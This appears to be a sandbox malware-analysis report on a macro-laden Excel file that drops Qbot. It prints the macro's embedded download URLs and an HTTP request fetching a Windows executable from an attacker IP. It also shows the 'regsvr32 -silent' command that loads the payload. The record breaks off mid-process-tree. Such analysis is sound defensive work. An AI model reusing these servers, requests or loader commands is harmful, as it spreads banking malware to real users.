                          Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
                          File Type:data
                          Stream Size:97
                          Entropy:3.61064918306
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:302
                          Entropy:4.65399600072
                          Base64 Encoded:True
                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
                          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/f
                          File Type:data
                          Stream Size:226
                          Entropy:2.95233038999
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
                          Data Raw:00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 00 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/o
                          File Type:data
                          Stream Size:272
                          Entropy:3.65039542802
                          Base64 Encoded:True
                          Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 8 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a 1 . . . ( . ( . . . . . . . h t t p : / / 9 4 . 1 4 0 . 1 1 2 . 1 2 6 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 4 1 . 2 7 . 2 1 3 / . . . . . . . . . . . . . . 5 . . . . . . .
                          Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 38 37 2f 02 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 b1 ff 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 31 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4469
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          File Type:data
                          Stream Size:4469
                          Entropy:4.43292705507
                          Base64 Encoded:False
                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                          Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2476
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                          File Type:data
                          Stream Size:2476
                          Entropy:3.52262448927
                          Base64 Encoded:False
                          Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . a . X P B
                          Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 146
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                          File Type:data
                          Stream Size:146
                          Entropy:1.48909835582
                          Base64 Encoded:False
                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 170
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                          File Type:data
                          Stream Size:170
                          Entropy:1.65437585425
                          Base64 Encoded:False
                          Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
                          Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 156
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                          File Type:data
                          Stream Size:156
                          Entropy:1.63365900945
                          Base64 Encoded:False
                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1073
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                          File Type:data
                          Stream Size:1073
                          Entropy:6.68948856439
                          Base64 Encoded:True
                          Data ASCII:. - . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . T . I c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
                          Data Raw:01 2d b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 c3 54 a0 49 63 07 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          09/28/21-22:08:33.756680ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22
                          09/28/21-22:08:36.768759ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22
                          09/28/21-22:08:42.780833ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22
                          09/28/21-22:08:54.828724ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22
                          09/28/21-22:08:57.840746ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22
                          09/28/21-22:09:03.872526ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 28, 2021 22:07:46.960819960 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:47.157187939 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:47.157272100 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:47.158303976 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:47.354664087 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191482067 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191550970 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191590071 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191625118 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191658974 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191696882 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191695929 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.191728115 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191761971 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191762924 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.191767931 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.191771030 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.191802979 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.191803932 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191838980 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.191860914 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.191888094 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.201548100 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.388736963 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.388782024 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.388839960 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.388859034 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.388957024 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.388994932 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398317099 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398423910 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398447037 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398467064 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398488045 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398502111 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398509979 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398530960 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398535013 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398538113 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398552895 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398572922 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398576975 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398588896 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398597002 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398611069 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398622990 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398627996 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398644924 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.398660898 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.398675919 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.400187016 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.585516930 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.585740089 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.605524063 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605568886 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605587959 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605607986 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605633020 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605655909 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605681896 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605710983 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605731964 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605753899 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.605756044 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605779886 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605786085 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.605792046 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.605803967 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.605818987 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.605827093 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.605851889 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.607300043 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.782207966 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.782372952 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.813605070 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813628912 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813640118 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813657045 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813693047 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813709974 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813725948 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813745022 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813760042 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813781023 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813792944 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.813798904 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813817024 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.813843966 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.813852072 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.815196037 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:48.978914022 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:48.979135036 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:49.021142960 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:49.021198034 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:49.021240950 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:49.021269083 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:49.021291018 CEST8049165190.14.37.187192.168.2.22
                          Sep 28, 2021 22:07:49.021306038 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:49.021311045 CEST4916580192.168.2.22190.14.37.187
                          Sep 28, 2021 22:07:49.021337032 CEST4916580192.168.2.22190.14.37.187

                          HTTP Request Dependency Graph

                          • 190.14.37.187

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.2249165190.14.37.18780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          Sep 28, 2021 22:07:47.158303976 CEST0OUTGET /44467.9218096065.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 190.14.37.187
                          Connection: Keep-Alive
                          Sep 28, 2021 22:07:48.191482067 CEST1INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Tue, 28 Sep 2021 20:07:48 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 259072
                          Connection: keep-alive
                          X-Powered-By: PHP/5.4.16
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: no-cache, no-store, must-revalidate
                          Content-Disposition: attachment; filename="44467.9218096065.dat"
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 16 03 00 00 da 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 27 06 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 30 03 00 70 00 00 00 f4 60 27 06 7c 01 00 00 00 70 27 06 d8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 27 06 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a 14 03 00 00 10 00 00 00 16 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 30 03 00 00 02 00 00 00 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 10 00 00 00 40 03 00 00 60 00 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 30 06 24 06 00 50 03 00 00 68 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 6e 07 00 00 00 60 27 06 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 07 00 00 00 70 27 06 00 08 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a!0'0p`'|p'`'.textj `.edatap0@@.data@`@.data0$Ph|@.rdatatn`'@.rsrcp'@@


                          Code Manipulations

                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: EXCEL.EXE PID: 2752 Parent PID: 596

                          General

                          Start time:22:07:20
                          Start date:28/09/2021
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                          Imagebase:0x13f090000
                          File size:28253536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Analysis Process: regsvr32.exe PID: 3048 Parent PID: 2752

                          General

                          Start time:22:08:52
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd.red
                          Imagebase:0xff540000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: regsvr32.exe PID: 2960 Parent PID: 3048

                          General

                          Start time:22:08:53
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -silent ..\Drezd.red
                          Imagebase:0xb90000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.617600278.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.615656945.00000000003D0000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:moderate

                          Analysis Process: explorer.exe PID: 2980 Parent PID: 2960

                          General

                          Start time:22:08:56
                          Start date:28/09/2021
